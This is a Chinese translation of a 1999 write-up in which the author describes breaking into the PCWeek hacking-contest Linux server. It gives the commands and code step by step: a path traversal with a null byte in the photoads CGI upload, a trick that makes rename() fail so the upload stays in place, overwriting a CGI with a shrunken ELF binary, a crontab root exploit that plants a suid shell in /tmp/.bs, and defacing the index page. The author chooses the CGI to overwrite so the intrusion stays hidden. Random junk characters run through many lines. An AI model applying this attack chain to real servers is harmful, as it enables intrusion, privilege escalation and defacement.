JFS侵入PCWEEK-LINUX主机的详细过程

译者注：PCWeek-Linux 主机是著名电脑杂志 PCWeek 为了测试 WEB 服务器 IIS（NT平台）
和 Apache（Linux平台）的安全性，提供给黑客/骇客攻击的两台主机之一。另一台主机安装
4 x- Z4 d8 ?* J) K! X的是 IIS（NT平台）。详细情况请访问网站：http://www.hackpcweek.com/。

7 ?0 L7 O. Q, z% C) o" D
2 b  k! `1 @; f' s9 j7 P8 a/ W7 n首先要进行的当然是——收集远端主机信息：打开的端口和提供的网络服务等。经过扫
; C3 a- Q, s" j. q: B描后发现大多数端口都被过滤掉了，原因可能是安装了防火墙或设置了 TCP-Wrapper 。所
以我们只能从 HTTP 服务器着手了。
2 _  H# @( C/ I6 u
lemming:~# telnet securelinux.hackpcweek.com 80
Trying 208.184.64.170...
2 l+ Z$ H$ j) \1 C' ?. [Connected to securelinux.hackpcweek.com.
Escape character is '^]'.
POST X HTTP/1.0

HTTP/1.1 400 Bad Request
  F, r' n9 w$ @: u3 G  _Date: Fri, 24 Sep 1999 23:42:15 GMT
Server: Apache/1.3.6 (Unix) (Red Hat/Linux)
% i4 k, E4 v  l; F! N* X- t0 \(...)
Connection closed by foreign host.
lemming:~#
" O. ]2 c# ~! R: {
嗯，服务器操作系统是 Red Hat，WEB服务器是 Apache/1.3.6。从网页上可知服务器安
装了 mod_perl，但只有一个 fingerprint 功能，对我们没有什么用处。
Apache 1.3.6 本身没有包含任何可供远端用户使用的CGI程序，但我们不清楚Red Hat
3 I4 x! n  o8 N1 S6 K的发行版本中是否有，所以我们进行了一些测试（test-cgi, wwwboard, count.cgi等）。
结果令人失望。于是我们尝试找出网站的结构。经过对该网站HTML页的分析，终于找出
, _& }7 ~2 V8 j& a了网站DocumentRoot下的目录结构：

- x9 z) {( r( W9 q/
/cgi-bin
/photoads/
! [, |4 X; z. Y- h8 M1 J4 C  g* G/photoads/cgi-bin
$ N- R* \! r( w. K- B! z! x5 L
6 C  j: x, H( N% A" U; V很自然地，我们的眼光落在 photoads 这个安装模块上。该商用CGI包可在"http://
www.hoffoce.com"找到，价格为$149，包括供检查和修改用的PERL源代码。
我们找到一个朋友，了解和掌握 photoads 在 Linux 平台上的安装情况，从而大致清楚
7 ^: f- H. @8 ?( ^7 f. q5 l运行在该主机上的 photoads。
检查了缺省安装的文件后，我们发现可以取得所有用户名及其口令的数据库（http://
securelinux.hackpcweek.com/photoads/ads_data.pl），但当我们试图访问配置文件
/photoads/cgi-bin/photo_cfg.pl 时，服务器的设置拒绝了这个请求。
通过 /photoads/cgi-bin/env.cgi，我们可以知道该服务器的许多详细情况，如
/ h  V. K: w4 k8 {DocumentRoot 在文件系统的位置（/home/httpd/html），运行 Apache 服务器的用户（
0 c+ R4 n/ O, V  |: C' h  Tnobody）等。
现在，开始寻找漏洞的第一步，我们尝试寻找是否存在 SSI 或 mod_perl 嵌入 HTML
命令的漏洞，如：

+ F9 x; f" Q2 U! z- f) \, W<!--#include file="..."--> for SSI
. B7 A) ]  F5 z% ^/ B* ]; C9 Y<!--#perl ...--> for mod_perl

但脚本中的匹配表达式却在许多输入域上过滤此类输入。不过与此同时我们却发现有一
个用户赋值的变量在转换成 HTML 代码前，并没有检查其值的合法性。我们可以通过它将命
: a" @. c' f. ]令嵌入到由服务器端解析的 HTML 代码中：

0 p# u( s' W; r在 post.cgi，行 36：
print "you are trying to post an AD from another URL:<b> $ENV{'HTTP_REFERER'}\n";

7 b: G2 Y( N' |+ g) ]4 y1 @$ }: ]$ENV{'HTTP_REFERER'}是一个用户赋值的变量，我们可以通过它将任何 HTML 嵌入到代
3 u/ Y' h6 u; _' \' q& R% o9 M, V- {码中。
请阅读我们提供的文件 getit.ssi 和 getit.mod_perl。
' `- T; L' ^2 b0 r- t0 W# N* m在命令行下使用这些文件如下：

" r6 b6 I0 Q+ d! _4 b6 _lemming:~# cat getit.ssi | nc securelinux.hackpcweek.com 80
  E9 {/ U/ F" h" I% ~4 T; T
但不幸的是，该主机的配置并不允许 SSI 或 mod_perl，所以我们无法利用这个方法侵
入系统。
3 L* T' {% A/ Z" G5 @. p
因此我们决定在CGI脚本中寻找缺口。在PERL脚本中许多漏洞往往出现在 open()、
3 G: [, `+ Z% z! k$ `system() 或 `` 等调用中，前一个允许读/写/执行，而后两个允许执行。
虽然在该主机找不到后两种调用，但我们却发现了一些 open() 调用：
, N. N6 _0 H# V7 G- m+ R
lemming:~/photoads/cgi-bin# grep 'open.*(.*)' *cgi | more
; W, y( L5 \0 t' `4 g( i% d
advisory.cgi: open (DATA, "$BaseDir/$DataFile");
edit.cgi: open (DATA, ">$BaseDir/$DataFile");
5 j  V2 K& K1 A* x" e) j/ }edit.cgi: open(MAIL, "|$mailprog -t") || die "Can't open $mailprog!\n";
) z1 H9 S! h9 F4 T+ rphoto.cgi: open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
photo.cgi: open ( FILE, $filename );
2 |$ @5 V* V3 Q( ~$ O4 j( ~(...)
% ^  g/ _1 C/ V! u
% M* }. R* o8 u) n3 S" d: O$BaseDir 和 $DataFile 两个变量是在配置文件中定义，且不能在运行时修改，无法被
我们利用。
但其余两个就……

5 q; J- z: V; W在 photo.cgi，行 132：
# z9 N8 _% u- C  |4 v/ o7 t/ |! S$write_file = $Upload_Dir.$filename;
% H/ ~5 M, i& L. _8 Q% j" @2 `
9 O4 H( [5 [: `" ?3 Zopen(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
print ULFD $UPLOAD{'FILE_CONTENT'};
6 G# N' R0 a5 s& h+ q& A! D1 jclose(ULFD);

因此，如果我们可以修改 $write_file 变量，就可以写文件系统中的任何文件。
  A# e* w* |- Y9 |# b$write_file 变量来自：
( a6 V) n, b7 w9 s0 ^
$write_file = $Upload_Dir.$filename;

! j* }% Z1 R: `  [. z( E" N+ v其中，$Upload_Dir 在配置文件中定义，我们无法修改，但 $filename 变量又如何呢？
: Y4 I8 X6 g9 j8 k
2 c1 ]. |4 K+ ^( G$ i4 ~在 photo.cgi，行 226：
% Q" @& G" d% R  O5 y! V' _if( !$UPLOAD{'FILE_NAME'} ) { show_file_not_found(); }

$ ^8 h5 F/ _' X# h9 W. E# @, f) b9 ?$filename = lc($UPLOAD{'FILE_NAME'});
* J) g, y5 g7 U! }( X9 S$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;
6 z2 Y; W% |* ]; `
; G" F2 R& G" S6 d# T4 q1 Tif ($filename =~ m/gif/) {
$type = '.gif';
}elsif ($filename =~ m/jpg/) {
! z9 M/ m( r) u3 K0 q/ W/ i! }- E$type = '.jpg';
}else{
7 B5 q' _0 q& U. @{&Not_Valid_Image}
}

5 r) F1 _! ^. ^# u; [* ~3 I由此可知，该变量来自从提交表格的变量组分解出来的 $UPLOAD{'FILE_NAME'}，而且必
须经过匹配表达式过滤，因此我们不能用"../../../../../../../../etc/passwd"格式来取
得任何文件。匹配表达式为：
3 I- X4 s8 ^. m" M" I" n; P- p( H
5 A& F! [: \7 x0 ^$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;

* C- }! S4 ^! F' `6 l我们看到，如 $filename 与该表达式匹配，则返回ASCII码1（SOH）。同时，变量还必
5 P0 X& B, _* m0 e0 v% b- U% i须包含"gif"或"jpg"，以通过 Not_Valid_Image 过滤器。
3 u  s. l, _% M. v! p2 L6 G经过多次尝试，以及从 Phrack 的关于PERL CGI安全性文章的帮助，我们发现以下格式

/jfs/\../../../../../../../export/www/htdocs/index.html%00.gif
2 z- k8 F* t1 [8 o5 b! k% _% A  y
可以成功修改WEB服务器根目录下的index.html文件。:-)
然而，为了上载文件，我们仍须绕过更多的脚本代码。我们发现无法通过POST方法发送
" K1 Y/ L( v/ K( k" u1 t8 |, @包含上述内容的表格（无法转换%00），唯一的方法只能是GET。
& v/ O3 @( e" @( c+ b( [' Z# s% W在 photo.cgi ，行 256，会检查被上载文件的内容是否符合图像定义（宽/长/大小）
! C$ X8 {4 T4 X- j2 T9 r（记住，photo.cgi 是被当作某个AD上载图像的一个方法）。如果不符合这些细节，脚本将
% s- `: U! j6 M4 ~2 Z. [" \8 g删除该上载文件。这当然不是我们所希望的！
PCWeek 网站配置文件将 Imagesize 设为 0，所以我们可以忽略该脚本中有关JPG部分，
5 _  p- U5 a/ M# W6 I而将主要精力集中在GIF上。

if ( substr ( $filename, -4, 4 ) eq ".gif" ) {
  B9 W6 e$ i' topen ( FILE, $filename );
' M. }% Y: J7 E! f) {6 Kmy $head;
( O! W4 s3 c" R0 Z8 }* L3 @. Lmy $gHeadFmt = "A6vvb8CC";
7 p( T- p2 L6 S' |7 k+ Mmy $pictDescFmt = "vvvvb8";
) @- x' X; y# g# Uread FILE, $head, 13;
; ~5 D& A/ k. C- I0 V9 J(my $GIF8xa, $width, $height, my $resFlags, my $bgColor, my $w2h) = unpack $gHeadFmt, $head;
& m) y! Y9 f) V, J' sclose FILE;
$PhotoWidth = $width;
) |8 b9 t$ z+ j* x' _& }  B$PhotoHeight = $height;
$PhotoSize = $size;
( J& y1 B  C9 areturn;
}

在 photo.cgi，行 140：

$ R: V: B" }6 A. Z2 K( Bif (($PhotoWidth eq "") || ($PhotoWidth > '700')) {
: {' H: o8 j, C1 {- D, v5 W; \{&Not_Valid_Image}
}
0 |, e- z' U9 [: e: U5 x; ?
5 Y- j' @# G0 Z* G  Iif ($PhotoWidth > $ImgWidth || $PhotoHeight > $ImgHeight) {
{&Height_Width}
/ W( V# ~) ^: J# k}

由上可知，$PhotoWidth不能大于700，不能为空，且不能大于 $ImgWidth（缺省为350）
) h% q1 [) r" i3 |。
1 y( N; R4 C) T8 f' O所以我们使 $PhotoWidth!="" 且 $Photowidth<350 即可。
2 T( Z0 X- w& |  F对于 $PhotoHeight，则必须小于 $ImgHeight（缺省为250）。
综合以上要求，我们可以得到一个可以使用的数据：$PhotoWidth==$PhotoHeight==0。
# ?' ?; Z4 f! L  n2 k研究提取该值的脚本后，我们唯一要做的就是将文件的第6至第9字节的值置为 ASCII 码 0
. {3 B3 v# V/ G2 P' Y（NUL）。
在确保 FILE_CONTENT（文件内容）符合以上所有要求后，我们又在以下代码遇到了另一
1 p8 V  H; D4 i4 \0 c+ Y4 s! G个问题：
" u$ Y1 g- B" b. O6 l+ l
5 `) l7 {. {  ~6 g4 Schmod 0755, $Upload_Dir.$filename;
5 g" D, a9 @& ~5 e, u6 H  [$newname = $AdNum;
rename("$write_file", "$Upload_Dir/$newname");
  U- }: O9 E3 H
Show_Upload_Success($write_file);
" R( W/ e: G( M) W% q9 f) q
( w1 R6 G' D3 ?2 n' E5 Z哇！文件将被改名/移动（这可是我们绝对不希望的！）。
& a5 ?+ [6 o! G% m' {查找 $AdNum 变量的最终处理过程，我们发现它只能包含数字：

$UPLOAD{'AdNum'} =~ tr/0-9//cd;
$UPLOAD{'Password'} =~ tr/a-zA-Z0-9!+&#%$@*//cd;
' A& K! |3 k: R0 E4 C' x* \- ]$AdNum = $UPLOAD{'AdNum'};

" @. x! W/ W( `0 a% d1 L其余的字符将被删除。因此我们不能直接应用"../../../"这种方法。
! i0 B5 E9 M8 y/ n0 g$ j那么，应该怎样做呢？我们看到 rename() 函数需要两个参数：旧的路径和新的路径。
  i0 L4 z$ E& G( C2 m: I+ |哈哈，在函数过程中没有错误检查！当函数出错后将跳到下一行继续执行！那么如何才能使
, B2 \8 h7 t* a该函数失败呢？Linux 内核对文件名长度限制为1024字节。因此如能使脚本将文件改名时新
文件名超过1024字节长，即可绕过这个过滤器。
所以，下一步就是要向系统传递一个大约1024字节长的AD号码。但由于脚本仅允许我们
: O: k* M, ^; `# W* A发送对应AD号码已存在的图片，而且由系统产生一个10^1024（10的1024次幂，即小数点前有
/ O+ f" z- W0 _2 [1024个数字——backend注）的AD号码要花的时间对我们来说似乎太长了。;-)
我们又遇到另一个难题了！……
2 K5 |7 w. e5 ]9 L; T
我们发现输入错误检查函数可以帮助我们创建一个指定的AD号码！浏览 edit.cgi 脚本
后，你也许就会想到：如果输入是一个文件名+回车符+一个1024位的数字，会产生什么结果
呢？;-)
请阅读用于创建新AD值的程序文件 long.adnum。
$ I$ X2 o/ T8 k, t% B  t4 j1 ]当成功绕过 $AdNum 的检查后，我们就可以让脚本创建/覆盖用户 nobody 有权写的任何
文件，其中包含了我们所希望的东西（GIF头部的NUL除外）。
8 f, I" Y4 U% f* S
3 a* P+ Z. ?1 ~3 g现在就让我们对该主机试一试这个方法。
嗯，so far so good（一切顺利）。但当我们试图让脚本改写 index.html 文件时无法
( m' }( X) c$ _成功。:( 其中的原因可能是没有覆盖该文件的权限（该文件由root拥有）。

% H, v# d: N. t  B/ o
; h& V' f; e* |让我们试一下是否还有其它入侵方法……
. k- H. r* n/ \/ @; L6 p
我们决定尝试修改CGI程序，以使其按我们的意愿运行:)。这种方法还可以让我们搜寻那
些“绝密”文件，然后拿出动卖。:)
我们修改了“覆盖”脚本，并让其成功地覆盖了一个CGI！:) 为了不覆盖那些较为重要
的CGI（这是提高隐蔽性的聪明法子——backend注），最后我们选择了 advisory.cgi（你知
道它有什么用吗？:)）
5 Q1 w1 Y3 Q1 F9 _' |现在，我们将要上载一个shell脚本，以便我们可以执行一些命令。呵呵
8 ]. U9 J) ]* ~+ y2 Z) @然而，这个以CGI方式运行的shell脚本必须符合以下格式：
6 ~9 W8 m: A- N( T
" v' D. p2 ?" x" @  V#!/bin/sh
echo "Content-type: text/html"
" h- Q6 a2 P9 S2 d/ hfind / "*secret*" -print

同时要记得，第6至第9字节必须为0或很小的值，以符合上面提及的大小定义……
; y2 x4 M2 [6 q& W
% A% _" l" ]' @* H- h! K#!/bi\00\00\00\00n/sh
& W! J& f# w/ N5 @8 q" s5 t
& E% U/ \" T( t, e以上这种方法是行不通的，内核只会读取前5个字节（#!/bi）内容并执行。在该主机中
我们无法只用三个字节去获得一个shell。又遇到难题了！:(
- k3 z: U& {7 c. a; `, |' W% Z
让我们看一下ELF（Linux缺省可执行类型）二进制文件格式，就会发现那些位置字节的
" `( P, X7 J; S2 N. n内容均为0x00。:) Yohoo :)
  o" p5 W# b; g# H; J% i" u解决了这个问题后，现在我们需要将这个ELF可执行文件上载到远端服务器中。注意，文
$ A# Y8 K# ~  Z件内容必须经过编码，因为我们已知道只能通过GET方法上载，而不是POST。因此还要考虑到
3 o2 ]. `6 @# y2 M7 v. pURI的最大长度。Apache 服务器上URI最大长度设为8190字节。别忘了，我们还有一个很长的
% x2 h  k1 e7 O/ Y4 c3 Q1024字节的AD号码，所以经编码后的ELF文件长度限制为大约7000字节。
4 p; P. o6 ^  ^( x1 j
以下这个程序：

lemming:~/pcweek/hack/POST# cat fin.c
#include <stdio.h>
; w/ C% {% w& Smain()
{
printf("Content-type: text/html\n\n\r");
fflush(stdout);
0 M4 ?. D4 r5 o( S1 V  o  Texeclp("/usr/bin/find","find","/",0);
* ]7 L% U" X9 i& R}
% X* M) c+ [& e4 S8 i9 u
编译后：
2 G4 a/ a# Q5 V" \
lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 4280 Sep 25 04:18 fin*

优化（清除symbols）后：
. }- f) c8 {. ^/ ^- }4 _; B
; X1 u1 e* j  H, B. ilemming:~/pcweek/hack/POST# strip fin
! y! M* p" F$ n5 Q% n- Y3 ]$ clemming:~/pcweek/hack/POST# ls -l fin
  C' u5 w) @$ B( C+ Y' F  a/ A! }-rwxr-xr-x 1 root root 2812 Sep 25 04:18 fin*
lemming:~/pcweek/hack/POST#

URL编码后：

& T6 a. k  S( b! r0 f$ w1 Tlemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 7602 Sep 25 04:20 fin.url

这个文件大小超过了限制值。:(
我们只能自行编辑二进制文件以尽量减小文件体积。这可不是一件轻松的工作，但却有
效：

; o/ I" j: V1 e* F( o/ y( e' ilemming:~/pcweek/hack/POST# joe fin
lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 1693 Sep 25 04:22 fin*
8 R* }4 Q! w% q. olemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
; u' j: m) M1 j0 A- G-rw-r--r-- 1 root root 4535 Sep 25 04:22 fin.url
* _4 Z0 B! P  Klemming:~/pcweek/hack/POST#
: g0 k; a* I7 b! ^& Q' l4 \! n
! o' y0 f) j0 V4 g. a请阅读 get.sec.find文件，还有 to_url 脚本和用来运行一些基本命令的*.c文件。
6 L7 `+ i, A- Z) o6 X0 Q' e- a5 N% c
现在，将这个CGI上载到服务器，再用浏览器访问它，如：
  d4 {2 V0 I! |0 E- A! h; g
8 A% g1 W* R  xwget http://securelinux.hackpcweek.com/photoads/cgi-bin/advisory.cgi

0 a3 u  y. M) A7 `8 Q/ X% R% C6 ~服务器返回的结果相当于在服务器上执行 find / 命令。:)
但我们在该服务器中找不到任何“绝密”文件，或许是nobody用户无权访问的缘故。:(
我们尝试了更多的命令搜索，如ls等，但仍无法找到它们的踪影。
0 r; m0 P! a  z, k: r- T[我怀疑这些文件是否真的保存在该服务器上！]
7 {4 C" x/ o. g) S

# W$ A4 M+ @. ?) o/ W- k, K  s好了，现在是获取 root 权限的时候了。利用最新发现的 Red Hat crontab 漏洞就可以
轻松做到这一点。该漏洞详情请参阅 Bugtraq 或 securityfocus 上相关文档。
我们修改了源程序以适应自己的需要，因为我们不需交互式 root shell，而是创建一个
用户 nobody 可访问的 suid root shell，如 /tmp/.bs。我们再次上载该CGI，并运行它，
1 A/ q9 m, _$ q$ i! m/ G观察其运行结果。
我们制作了执行"ls /tmp"命令的CGI，执行后确认我们已拥有了一个 suid root shell。
另外，我们还上载了一个文件 /tmp/xx，用于修改 index.html 文件。

execlp("/tmp/.bs","ls","-c","cp /tmp/xx /home/httpd/html/index.html",0);
* O& T6 w. M4 d( O9 |9 N% [
' ]7 k0 c! [5 W; V7 h好了。游戏结束！:)
总共花费了大约20个小时，还算不错！呵呵。:)
& B9 i9 W2 \' v2 @3 W$ a4 u